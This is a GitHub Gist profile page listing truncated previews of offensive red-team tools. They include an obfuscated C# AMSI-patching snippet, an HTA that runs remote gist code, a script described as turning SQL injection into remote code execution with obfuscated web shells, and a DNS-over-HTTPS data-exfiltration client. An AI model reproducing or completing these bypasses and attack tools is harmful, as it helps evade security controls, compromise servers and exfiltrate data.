Skip to content

Instantly share code, notes, and snippets.

View 0xHossam's full-sized avatar
🫠

Hossam Ehab 0xHossam

🫠
View GitHub Profile
# Define a complex, meaningless variable name for the C# source code
$ObfuscatedQuantumEntropy = @"
using System;
using System.Runtime.InteropServices;
public class _x9F3kL7mPqZ2wR8tYvN4_
{
static byte[] _qW9xP4rT2yL7mK8nJ3v_ = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
static byte[] _zT2mR8kY6pN3vL9wJ4x_ = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 };
<html>
<head>
<title>Execute Gist HTA</title>
<HTA:APPLICATION
APPLICATIONNAME="Execute Gist HTA"
ID="ExecuteGistHTA"
VERSION="1.0"
BORDER="thin"
BORDERSTYLE="normal"
INNERBORDER="no"
@0xHossam
0xHossam / SQLtoRCE.py
Last active June 8, 2025 11:01
A Python utility that leverages SQL injection to achieve remote code execution (RCE) by deploying obfuscated web shells, featuring proxy support and multi-threading for effective red team operations.
import argparse
import requests
import urllib.parse
import sys
import base64
import logging
import random
import time
import threading
from typing import Optional
@0xHossam
0xHossam / client.py
Last active June 10, 2025 15:36
Data Exfiltration Using DNS over HTTPS (DoH) for HTTPS POST Requests & Sending Data in Chunks
# Info: Stealthy Data Exfiltration Using (DoH) - Client Code
# Date: May 26, 2024
# Author: Hossam
import os, glob, requests, logging, struct, base64, random, time, httpx
from datetime import datetime
import urllib3
import win32com.client
from colorama import Fore, Style, init
from cryptography.fernet import Fernet